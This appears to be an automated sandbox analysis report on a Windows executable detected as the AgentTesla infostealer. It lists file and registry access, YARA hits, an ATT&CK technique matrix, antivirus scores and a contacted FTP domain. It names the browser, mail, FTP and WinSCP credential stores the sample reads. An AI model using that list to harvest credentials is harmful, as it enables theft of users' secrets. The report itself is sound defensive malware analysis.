Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Users\user\Desktop\wKmhzHd4MC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3e8e830.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wKmhzHd4MC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2968931469.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wKmhzHd4MC.exe PID: 2084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wKmhzHd4MC.exe PID: 5628, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3e8e830.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wKmhzHd4MC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2968931469.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wKmhzHd4MC.exe PID: 2084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wKmhzHd4MC.exe PID: 5628, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3e8e830.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.wKmhzHd4MC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2968931469.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wKmhzHd4MC.exe PID: 2084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wKmhzHd4MC.exe PID: 5628, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	21 Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
wKmhzHd4MC.exe	68%	ReversingLabs	Win32.Trojan.AgentTesla
wKmhzHd4MC.exe	100%	Avira	HEUR/AGEN.1308792
wKmhzHd4MC.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.fontbureau.com	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ftp.normagroup.com.tr	104.247.165.99	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ftp.normagroup.com.tr	wKmhzHd4MC.exe, 00000004.00000002.2968931469.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	wKmhzHd4MC.exe, 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
